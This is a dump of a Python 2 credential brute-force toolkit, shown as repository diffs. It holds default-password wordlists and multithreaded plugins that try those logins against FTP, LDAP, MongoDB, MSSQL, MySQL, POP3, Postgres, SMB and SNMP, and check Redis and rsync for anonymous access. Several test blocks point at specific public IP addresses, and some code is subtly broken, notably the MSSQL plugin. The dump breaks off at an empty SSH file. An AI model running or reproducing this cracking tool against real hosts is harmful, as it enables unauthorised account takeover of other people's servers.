root:rootpassword
root:rootpasswd
root:admin
root:admin123
root:-
root:_
root:1qaz2wsx
root:666666
root:888888
root:123123
root:toor
root:123abc
root:passw0rd
admin:1
admin:12
admin:admin
admin:123
admin:1234
admin:12345
admin:123456
admin:1234567
admin:12345678
admin:123456789
admin:1234567890
admin:654321
admin:54321
admin:00000000
admin:88888888
admin:pass
admin:password
admin:passwd
admin:!@#$%^
admin:1q2w3e
admin:qawsed
admin:pwd
admin:1qaz2ws3e4
admin:qazwsxedc
admin:!@#$%^&*
admin:rootpass
admin:rootpassword
admin:rootpasswd
test:1
test:12
test:123
test:1234
test:123123
test:12345
test:123456
test:1234567
test:12345678
test:123456789
test:test
test:654321
test:54321

69
Bruteforce/conf/tomcat.conf Normal file
View File

@ -0,0 +1,69 @@
tomcat:1
tomcat:12
tomcat:tomcat
tomcat:tomcat123
tomcat:tomcat123456
tomcat:123
tomcat:1234
tomcat:12345
tomcat:123456
tomcat:1234567
tomcat:12345678
tomcat:123456789
tomcat:1234567890
tomcat:654321
tomcat:54321
tomcat:00000000
tomcat:88888888
tomcat:pass
tomcat:password
tomcat:passwd
tomcat:!@#$%^
tomcat:1q2w3e
tomcat:qawsed
tomcat:pwd
tomcat:1qaz2ws3e4
tomcat:qazwsxedc
tomcat:!@#$%^&*
tomcat:s3cret
admin:1
admin:12
admin:admin
admin:123
admin:1234
admin:12345
admin:123456
admin:1234567
admin:12345678
admin:123456789
admin:1234567890
admin:654321
admin:54321
admin:00000000
admin:88888888
admin:pass
admin:password
admin:passwd
admin:!@#$%^
admin:1q2w3e
admin:qawsed
admin:pwd
admin:1qaz2ws3e4
admin:qazwsxedc
admin:!@#$%^&*
admin:rootpass
admin:rootpassword
admin:rootpasswd
test:1
test:12
test:123
test:1234
test:12345
test:123456
test:1234567
test:123123
test:12345678
test:123456789
test:test
test:654321
test:54321

34
Bruteforce/conf/vnc.conf Normal file
View File

@ -0,0 +1,34 @@
root
vnc
vnc123
vncpass
vnc123456
vncpassword
vncpasswd
123
1234
12345
123456
1234567
12345678
123456789
1234567890
654321
rootpass
54321
00000000
88888888
pass
password
passwd
!@#$%^
1q2w3e
qawsed
pwd
1qaz2ws3e4
qazwsxedc
!@#$%^&*
root123
root123456
rootpassword
rootpasswd

69
Bruteforce/conf/web.conf Normal file
View File

@ -0,0 +1,69 @@
cisco:1
cisco:12
cisco:cisco
cisco:123
cisco:1234
cisco:12345
cisco:123456
cisco:1234567
cisco:12345678
cisco:123456789
cisco:1234567890
cisco:654321
cisco:54321
cisco:00000000
cisco:88888888
cisco:pass
cisco:password
cisco:passwd
cisco:!@#$%^
cisco:1q2w3e
cisco:qawsed
cisco:pwd
cisco:1qaz2ws3e4
cisco:qazwsxedc
cisco:!@#$%^&*
cisco:rootpass
cisco:rootpassword
cisco:rootpasswd
admin:1
admin:12
admin:admin
admin:123
admin:1234
admin:12345
admin:123456
admin:1234567
admin:12345678
admin:123456789
admin:1234567890
admin:654321
admin:54321
admin:00000000
admin:88888888
admin:pass
admin:password
admin:passwd
admin:!@#$%^
admin:1q2w3e
admin:qawsed
admin:pwd
admin:1qaz2ws3e4
admin:qazwsxedc
admin:!@#$%^&*
admin:rootpass
admin:rootpassword
admin:rootpasswd
test:1
test:12
test:123
test:1234
test:12345
test:123456
test:1234567
test:123123
test:12345678
test:123456789
test:test
test:654321
test:54321

1
Bruteforce/factorys/__init__.py Normal file
View File

@ -0,0 +1 @@
#!/usr/bin/python

BIN
Bruteforce/factorys/__init__.pyc Normal file
View File

Binary file not shown.

101
Bruteforce/factorys/pluginFactory.py Normal file
View File

@ -0,0 +1,101 @@
# coding: utf-8
__author__="wilson"
import os
import sys
sys.path.append("../")
from plugins.ftp import *
from plugins.smb import *
from plugins.mysql import *
from plugins.mssql import *
from plugins.ldapd import *
from plugins.mongodb import *
from plugins.redisexp import *
from plugins.rsync import *
from plugins.snmp import *
from plugins.ssh import *
from plugins.ssltest import *
from plugins.vnc import *
from plugins.web import *
def ftpburp(c):
t = ftp_burp(c)
return t
def smbburp(c):
t = smb_burp(c)
return t
def mysqlburp(c):
t = mysql_burp(c)
return t
def mssqlburp(c):
t = mssql_burp(c)
return t
def ldapburp(c):
t = ldap_burp(c)
return t
def mongodbburp(c):
t = mongodb_burp(c)
return t
def redisburp(c):
t = redis_burp(c)
return t
def rsyncburp(c):
t = rsync_burp(c)
return t
def snmpburp(c):
t = snmp_burp(c)
return t
def sshburp(c):
t = ssh_burp(c)
return t
def sslburp(c):
t = ssl_burp(c)
return t
def vncburp(c):
t = vnc_burp(c)
return t
def webburp(c):
t = web_burp(c)
return t
#类
class pluginFactory():
def __init__(self,c):
self.pluginList=[]
self.config=c
self.pluginCategory= {
"ftp":ftpburp,
"smb":smbburp,
"mysql":mysqlburp,
"mssql":mssqlburp,
"ldap":ldapburp,
"mongodb":mongodbburp,
"redis":redisburp,
"rsync":rsyncburp,
"snmp":snmpburp,
"ssh":sshburp,
"ssl":sslburp,
"vnc":vncburp,
"web":webburp,
}
self.get_pluginList()
def get_pluginList(self):
for name in self.pluginCategory:
#实例化每个类
result_t=self.pluginCategory.get(name)(self.config)
self.pluginList.append(result_t)

BIN
Bruteforce/factorys/pluginFactory.pyc Normal file
View File

Binary file not shown.

BIN
Bruteforce/plugins/.DS_Store vendored Normal file
View File

Binary file not shown.

1
Bruteforce/plugins/__init__.py Normal file
View File

@ -0,0 +1 @@
__author__ = 'wilson'

BIN
Bruteforce/plugins/__init__.pyc Normal file
View File

Binary file not shown.

76
Bruteforce/plugins/ftp.py Normal file
View File

@ -0,0 +1,76 @@
#coding=utf-8
import time
import threading
from multiprocessing.dummy import Pool
from printers import printPink,printGreen
from ftplib import FTP
class ftp_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/ftp.conf")
def ftp_connect(self,ip,username,password,port):
crack=0
try:
ftp=FTP()
ftp.connect(ip,str(port))
ftp.login(user=username,passwd=password)
crack=1
ftp.close()
except Exception,e:
self.lock.acquire()
print "%s ftp service 's %s:%s login fail " %(ip,username,password)
self.lock.release()
return crack
def ftp_l(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
if self.ftp_connect(ip,username,password,port)==1:
self.lock.acquire()
printGreen("%s ftp at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s ftp at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['ftp']):
printPink("crack ftp now...")
print "[*] start crack ftp %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['ftp']:
pool.apply_async(func=self.ftp_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop ftp serice %s" % time.ctime()
print "[*] crack ftp done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'ftp': ['192.168.1.1:21']}
pinglist=['192.168.1.1']
test=ftp_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")

BIN
Bruteforce/plugins/ftp.pyc Normal file
View File

Binary file not shown.

86
Bruteforce/plugins/ldapd.py Normal file
View File

@ -0,0 +1,86 @@
#coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
import ldap
class ldap_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/ldapd.conf")
def ldap_connect(self,ip,username,password,port):
creak=0
try:
ldappath='ldap://'+ip+':'+port+'/'
l = ldap.initialize(ldappath)
re=l.simple_bind(username,password)
if re==1:
creak=1
except Exception,e:
if e[0]['desc']=="Can't contact LDAP server":
creak=2
pass
return creak
def ldap_creak(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=self.ldap_connect(ip,username,password,port)
if flag==2:
self.lock.acquire()
printGreen("%s ldap at %s can't connect\r\n" %(ip,port))
self.lock.release()
break
if flag==1:
self.lock.acquire()
printGreen("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s ldap at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
else:
self.lock.acquire()
print "%s ldap service 's %s:%s login fail " %(ip,username,password)
self.lock.release()
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['ldap']):
printPink("crack ldap now...")
print "[*] start ldap %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['ldap']:
pool.apply_async(func=self.ldap_creak,args=(str(ip).split(':')[0],str(ip).split(':')[1]))
pool.close()
pool.join()
print "[*] stop ldap serice %s" % time.ctime()
print "[*] crack ldap done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'ldap': ['124.172.223.236:389']}
pinglist=['192.168.1.1']
test=ldap_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")

BIN
Bruteforce/plugins/ldapd.pyc Normal file
View File

Binary file not shown.

101
Bruteforce/plugins/mongodb.py Normal file
View File

@ -0,0 +1,101 @@
#coding=utf-8
import time
import threading
from printers import printPink,printRed,printGreen
from multiprocessing.dummy import Pool
import pymongo
class mongodb_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/mongodb.conf")
def mongoDB_connect(self,ip,username,password,port):
crack=0
try:
connection=pymongo.Connection(ip,port)
db=connection.admin
db.collection_names()
self.lock.acquire()
printRed('%s mongodb service at %s allow login Anonymous login!!\r\n' %(ip,port))
self.result.append('%s mongodb service at %s allow login Anonymous login!!\r\n' %(ip,port))
self.lock.release()
crack=1
except Exception,e:
if e[0]=='database error: not authorized for query on admin.system.namespaces':
try:
r=db.authenticate(username,password)
if r!=False:
crack=2
else:
self.lock.acquire()
crack=3
print "%s mongodb service 's %s:%s login fail " %(ip,username,password)
self.lock.release()
except Exception,e:
pass
else:
printRed('%s mongodb service at %s not connect' %(ip,port))
crack=4
return crack
def mongoDB(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=self.mongoDB_connect(ip,username,password,port)
if flag in [1,4]:
break
if flag==2:
self.lock.acquire()
printGreen("%s mongoDB at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s mongoDB at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['mongodb']):
printPink("crack mongodb now...")
print "[*] start crack mongodb %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['mongodb']:
pool.apply_async(func=self.mongoDB,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop mongoDB serice %s" % time.ctime()
print "[*] crack mongoDB done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'mongodb': ['112.90.23.158:27017']}
pinglist=['192.168.1.1']
test=mongodb_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")

BIN
Bruteforce/plugins/mongodb.pyc Normal file
View File

Binary file not shown.

67
Bruteforce/plugins/mssql.py Normal file
View File

@ -0,0 +1,67 @@
#coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
import pymssql
class mssql_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/mssql.conf")
def mssql_connect(self,ip,username,password,port):
crack =0
try:
db=pymssql.connect(host=str(ip)+':'+str(port),user=username,password=password)
if db:
crack=1
db.close()
except Exception, e:
self.lock.acquire()
print "%s sql service 's %s:%s login fail " %(ip,username,password)
self.lock.release()
return crack
def mssq1(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=mssql_connect(ip,username,password,port)
if flag==2:
break
if flag==1:
self.lock.acquire()
printGreen("%s mssql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s mssql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['mysql']):
printPink("crack sql serice now...")
print "[*] start crack sql serice %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['mssql']:
pool.apply_async(func=self.mssq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop crack sql serice %s" % time.ctime()
print "[*] crack sql serice done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)

BIN
Bruteforce/plugins/mssql.pyc Normal file
View File

Binary file not shown.

80
Bruteforce/plugins/mysql.py Normal file
View File

@ -0,0 +1,80 @@
#coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
import MySQLdb
class mysql_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/mysql.conf")
def mysql_connect(self,ip,username,password,port):
crack =0
try:
db=MySQLdb.connect(ip,username,password,port=port)
if db:
crack=1
db.close()
except Exception, e:
if e[0]==1045:
self.lock.acquire()
print "%s mysql's %s:%s login fail" %(ip,username,password)
self.lock.release()
else:
self.lock.acquire()
print "connect %s mysql service at %s login fail " %(ip,port)
self.lock.release()
crack=2
return crack
def mysq1(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=self.mysql_connect(ip,username,password,port)
if flag==2:
break
if flag==1:
self.lock.acquire()
printGreen("%s mysql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s mysql at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['mysql']):
printPink("crack mysql now...")
print "[*] start crack mysql %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['mysql']:
pool.apply_async(func=self.mysq1,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop crack mysql %s" % time.ctime()
print "[*] crack mysql done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'mysql': ['127.0.0.1:3306']}
pinglist=['127.0.0.1']
test=mysql_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")

BIN
Bruteforce/plugins/mysql.pyc Normal file
View File

Binary file not shown.

BIN
Bruteforce/plugins/ndr.pyc Normal file
View File

Binary file not shown.

61
Bruteforce/plugins/pop3.py Normal file
View File

@ -0,0 +1,61 @@
#coding=utf-8
import time
from printers import printPink,printGreen
import threading
from multiprocessing.dummy import Pool
import poplib
def pop3_Connection(ip,username,password,port):
try:
pp = poplib.POP3(ip)
#pp.set_debuglevel(1)
pp.user(username)
pp.pass_(password)
(mailCount,size) = pp.stat()
pp.quit()
if mailCount:
lock.acquire()
printGreen("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
result.append("%s pop3 at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
lock.release()
except Exception,e:
print e
lock.acquire()
print "%s pop3 service 's %s:%s login fail " %(ip,username,password)
lock.release()
pass
def pop3_l(ip,port):
try:
d=open('conf/pop3.conf','r')
data=d.readline().strip('\r\n')
while(data):
username=data.split(':')[0]
password=data.split(':')[1]
pop3_Connection(ip,username,password,port)
data=d.readline().strip('\r\n')
except Exception,e:
print e
pass
def pop_main(ipdict,threads):
printPink("crack pop now...")
print "[*] start crack pop %s" % time.ctime()
starttime=time.time()
global lock
lock = threading.Lock()
global result
result=[]
pool=Pool(threads)
for ip in ipdict['pop3']:
pool.apply_async(func=pop3_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop pop serice %s" % time.ctime()
print "[*] crack pop done,it has Elapsed time:%s " % (time.time()-starttime)
return result

BIN
Bruteforce/plugins/pop3.pyc Normal file
View File

Binary file not shown.

73
Bruteforce/plugins/postgres.py Normal file
View File

@ -0,0 +1,73 @@
#coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
import psycopg2
import re
def postgres_connect(ip,username,password,port):
crack =0
try:
db=psycopg2.connect(user=username, password=password, host=ip, port=port)
if db:
crack=1
db.close()
except Exception, e:
if re.findall(".*Password.*",e[0]):
lock.acquire()
print "%s postgres's %s:%s login fail" %(ip,username,password)
lock.release()
crack=2
else:
lock.acquire()
print "connect %s postgres service at %s login fail " %(ip,port)
lock.release()
crack=3
pass
return crack
def postgreS(ip,port):
try:
d=open('conf/postgres.conf','r')
data=d.readline().strip('\r\n')
while(data):
username=data.split(':')[0]
password=data.split(':')[1]
flag=postgres_connect(ip,username,password,port)
time.sleep(0.1)
if flag==3:
break
if flag==1:
lock.acquire()
printGreen("%s postgres at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
result.append("%s postgres at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
lock.release()
break
data=d.readline().strip('\r\n')
except Exception,e:
print e
pass
def postgres_main(ipdict,threads):
printPink("crack postgres now...")
print "[*] start postgres %s" % time.ctime()
starttime=time.time()
global lock
lock = threading.Lock()
global result
result=[]
pool=Pool(threads)
for ip in ipdict['postgres']:
pool.apply_async(func=postgreS,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop crack postgres %s" % time.ctime()
print "[*] crack postgres done,it has Elapsed time:%s " % (time.time()-starttime)
return result

BIN
Bruteforce/plugins/postgres.pyc Normal file
View File

Binary file not shown.

BIN
Bruteforce/plugins/printers.pyc Normal file
View File

Binary file not shown.

66
Bruteforce/plugins/redisexp.py Normal file
View File

@ -0,0 +1,66 @@
#coding=utf-8
import time
import threading
from threading import Thread
from printers import printPink,printGreen
from Queue import Queue
import redis
class redis_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
#self.lines=self.config.file2list("conf/redis.conf")
self.sp=Queue()
def redisexp(self):
while True:
ip,port=self.sp.get()
try:
r=redis.Redis(host=ip,port=port,db=0,socket_timeout=8)
r.dbsize()
self.lock.acquire()
printGreen('%s redis service at %s allow login Anonymous login!!\r\n' %(ip,port))
self.result.append('%s redis service at %s allow login Anonymous login!!\r\n' %(ip,port))
self.lock.release()
except Exception,e:
pass
self.sp.task_done()
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['redis']):
printPink("crack redis now...")
print "[*] start crack redis %s" % time.ctime()
starttime=time.time()
for i in xrange(threads):
t = Thread(target=self.redisexp)
t.setDaemon(True)
t.start()
for ip in ipdict['redis']:
self.sp.put((str(ip).split(':')[0],int(str(ip).split(':')[1])))
self.sp.join()
print "[*] stop redis serice %s" % time.ctime()
print "[*] crack redis done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'redis': ['101.201.177.35:6379']}
pinglist=['101.201.177.35']
test=redis_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")

BIN
Bruteforce/plugins/redisexp.pyc Normal file
View File

Binary file not shown.

97
Bruteforce/plugins/rsync.py Normal file
View File

@ -0,0 +1,97 @@
# -*- coding: utf-8 -*-
import threading
from printers import printPink,printRed,printGreen
from multiprocessing.dummy import Pool
from Queue import Queue
import re
import time
import threading
from threading import Thread
from rsynclib import *
import sys
import socket
socket.setdefaulttimeout(10)
sys.path.append("../")
class rsync_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.sp=Queue()
def get_ver(self,host):
debugging = 0
r = rsync(host)
r.set_debuglevel(debugging)
return r.server_protocol_version
def rsync_connect(self,ip,port):
creak=0
try:
ver=self.get_ver(ip)# get rsync moudle
fp = socket.create_connection((ip, port), timeout=8)
fp.recv(99)
fp.sendall(ver.strip('\r\n')+'\n')
time.sleep(3)
fp.sendall('\n')
resp = fp.recv(99)
modules = []
for line in resp.split('\n'):
#print line
modulename = line[:line.find(' ')]
if modulename:
if modulename !='@RSYNCD:':
self.lock.acquire()
printGreen("%s rsync at %s find a module:%s\r\n" %(ip,port,modulename))
self.result.append("%s rsync at %s find a module:%s\r\n" %(ip,port,modulename))
#print "find %s module in %s at %s" %(modulename,ip,port)
self.lock.release()
modules.append(modulename)
except Exception,e:
print e
pass
return creak
def rsync_creak(self,ip,port):
try:
self.rsync_connect(ip,port)
except Exception,e:
print e
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['rsync']):
printPink("crack rsync now...")
print "[*] start crack rsync %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['rsync']:
pool.apply_async(func=self.rsync_creak,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop rsync serice %s" % time.ctime()
print "[*] crack rsync done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
from comm.config import *
c=config()
ipdict={'rsync': ['103.228.69.151:873']}
pinglist=['103.228.69.151']
test=rsync_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")

BIN
Bruteforce/plugins/rsync.pyc Normal file
View File

Binary file not shown.

194
Bruteforce/plugins/rsynclib.py Normal file
View File

@ -0,0 +1,194 @@
import base64
import re
try:
import hashlib
hash_md4 = hashlib.new("md4")
hash_md5 = hashlib.md5()
except ImportError:
# for Python << 2.5
import md4
import md5
hash_md4 = md4.new()
hash_md5 = md5.new()
# Import SOCKS module if it exists, else standard socket module socket
try:
import SOCKS; socket = SOCKS; del SOCKS # import SOCKS as socket
from socket import getfqdn; socket.getfqdn = getfqdn; del getfqdn
except ImportError:
import socket
from socket import _GLOBAL_DEFAULT_TIMEOUT
__all__ = ["rsync"]
# The standard rsync server control port
RSYNC_PORT = 873
# The sizehint parameter passed to readline() calls
MAXLINE = 8192
protocol_version = 0
# Exception raised when an error or invalid response is received
class Error(Exception): pass
# All exceptions (hopefully) that may be raised here and that aren't
# (always) programming errors on our side
all_errors = (Error, IOError, EOFError)
# Line terminators for rsync
CRLF = '\r\n'
LF = '\n'
# The class itself
class rsync:
'''An rsync client class.
To create a connection, call the class using these arguments:
host, module, user, passwd
All arguments are strings, and have default value ''.
Then use self.connect() with optional host and port argument.
'''
debugging = 0
host = ''
port = RSYNC_PORT
maxline = MAXLINE
sock = None
file = None
server_protocol_version = None
# Initialization method (called by class instantiation).
# Initialize host to localhost, port to standard rsync port
# Optional arguments are host (for connect()),
# and module, user, passwd (for login())
def __init__(self, host='', module='', user='', passwd='',port=873,
timeout=_GLOBAL_DEFAULT_TIMEOUT):
self.timeout = timeout
if host:
self.connect(host)
if module and user and passwd:
self.login(module, user, passwd)
def connect(self, host='', port=0, timeout=-999):
'''Connect to host. Arguments are:
- host: hostname to connect to (string, default previous host)
- port: port to connect to (integer, default previous port)
'''
if host != '':
self.host = host
if port > 0:
self.port = port
if timeout != -999:
self.timeout = timeout
self.sock = socket.create_connection((self.host, self.port), self.timeout)
self.af = self.sock.family
self.file = self.sock.makefile('rb')
self.server_protocol_version = self.getresp()
self.protocol_version = self.server_protocol_version[-2:]
return self.server_protocol_version
def set_debuglevel(self, level):
'''Set the debugging level.
The required argument level means:
0: no debugging output (default)
1: print commands and responses but not body text etc.
'''
self.debugging = level
debug = set_debuglevel
# Internal: send one line to the server, appending LF
def putline(self, line):
line = line + LF
if self.debugging > 1: print '*put*', line
self.sock.sendall(line)
# Internal: return one line from the server, stripping LF.
# Raise EOFError if the connection is closed
def getline(self):
line = self.file.readline(self.maxline + 1)
if len(line) > self.maxline:
raise Error("got more than %d bytes" % self.maxline)
if self.debugging > 1:
print '*get*', line
if not line: raise EOFError
if line[-2:] == CRLF: line = line[:-2]
elif line[-1:] in CRLF: line = line[:-1]
return line
# Internal: get a response from the server, which may possibly
# consist of multiple lines. Return a single string with no
# trailing CRLF. If the response consists of multiple lines,
# these are separated by '\n' characters in the string
def getmultiline(self):
line = self.getline()
return line
# Internal: get a response from the server.
# Raise various errors if the response indicates an error
def getresp(self):
resp = self.getmultiline()
if self.debugging: print '*resp*', resp
if resp.find('ERROR') != -1:
raise Error, resp
else:
return resp
def sendcmd(self, cmd):
'''Send a command and return the response.'''
self.putline(cmd)
return self.getresp()
def login(self, module='', user = '', passwd = ''):
if not user: user = 'www'
if not passwd: passwd = 'www'
if not module: module = 'www'
self.putline(self.server_protocol_version)
# self.putline('@RSYNCD: 28.0')
# self.protocol_version = 28
resp = self.sendcmd(module)
challenge = resp[resp.find('AUTHREQD ')+9:]
if self.protocol_version >= 30:
md5=hashlib.md5()
md5.update(passwd)
md5.update(challenge)
hash = base64.b64encode(md5.digest())
else:
md4=hashlib.new('md4')
tmp = '\0\0\0\0' + passwd + challenge
md4.update(tmp)
hash = base64.b64encode(md4.digest())
response, number = re.subn(r'=+$','',hash)
print response
resp = self.sendcmd(user + ' ' + response)
if resp.find('OK') == -1:
raise Error, resp
return resp
def getModules(self):
'''Get modules on the server'''
print self.server_protocol_version
self.putline(self.server_protocol_version)
resp = self.sendcmd('')
print resp
return resp
def close(self):
'''Close the connection without assuming anything about it.'''
self.putline('')
if self.file is not None:
self.file.close()
if self.sock is not None:
self.sock.close()
self.file = self.sock = None

BIN
Bruteforce/plugins/rsynclib.pyc Normal file
View File

Binary file not shown.

BIN
Bruteforce/plugins/rsyncs.pyc Normal file
View File

Binary file not shown.

72
Bruteforce/plugins/smb.py Normal file
View File

@ -0,0 +1,72 @@
#coding=utf-8
import time
import threading
from printers import printPink,printGreen
from impacket.smbconnection import *
from multiprocessing.dummy import Pool
from threading import Thread
class smb_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/smb.conf")
def smb_connect(self,ip,username,password):
crack =0
try:
smb = SMBConnection('*SMBSERVER', ip)
smb.login(username,password)
smb.logoff()
crack =1
except Exception, e:
self.lock.acquire()
print "%s smb 's %s:%s login fail " %(ip,username,password)
self.lock.release()
return crack
def smb_l(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
if self.smb_connect(ip,username,password)==1:
self.lock.acquire()
printGreen("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['smb']):
printPink("crack smb now...")
print "[*] start crack smb serice %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['smb']:
pool.apply_async(func=self.smb_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop smb serice %s" % time.ctime()
print "[*] crack smb done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'smb': ['10.211.55.3:445']}
pinglist=['101.201.177.35']
test=smb_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")

BIN
Bruteforce/plugins/smb.pyc Normal file
View File

Binary file not shown.

65
Bruteforce/plugins/snmp.py Normal file
View File

@ -0,0 +1,65 @@
#coding=utf-8
import time
import threading
from printers import printPink,printGreen
from multiprocessing.dummy import Pool
from pysnmp.entity.rfc3413.oneliner import cmdgen
class snmp_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/snmp.conf")
def snmp_connect(self,ip,key):
crack =0
try:
errorIndication, errorStatus, errorIndex, varBinds =\
cmdgen.CommandGenerator().getCmd(
cmdgen.CommunityData('my-agent',key, 0),
cmdgen.UdpTransportTarget((ip, 161)),
(1,3,6,1,2,1,1,1,0)
)
if varBinds:
crack=1
except:
pass
return crack
def snmp_l(self,ip,port):
try:
for data in self.lines:
flag=self.snmp_connect(ip,key=data)
if flag==1:
self.lock.acquire()
printGreen("%s snmp has weaken password!!-----%s\r\n" %(ip,data))
self.result.append("%s snmp has weaken password!!-----%s\r\n" %(ip,data))
self.lock.release()
break
else:
self.lock.acquire()
print "test %s snmp's scan fail" %(ip)
self.lock.release()
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
printPink("crack snmp now...")
print "[*] start crack snmp %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in pinglist:
pool.apply_async(func=self.snmp_l,args=(str(ip).split(':')[0],""))
pool.close()
pool.join()
print "[*] stop crack snmp %s" % time.ctime()
print "[*] crack snmp done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)

BIN
Bruteforce/plugins/snmp.pyc Normal file
View File

Binary file not shown.

84
Bruteforce/plugins/ssh.py Normal file
View File

@ -0,0 +1,84 @@
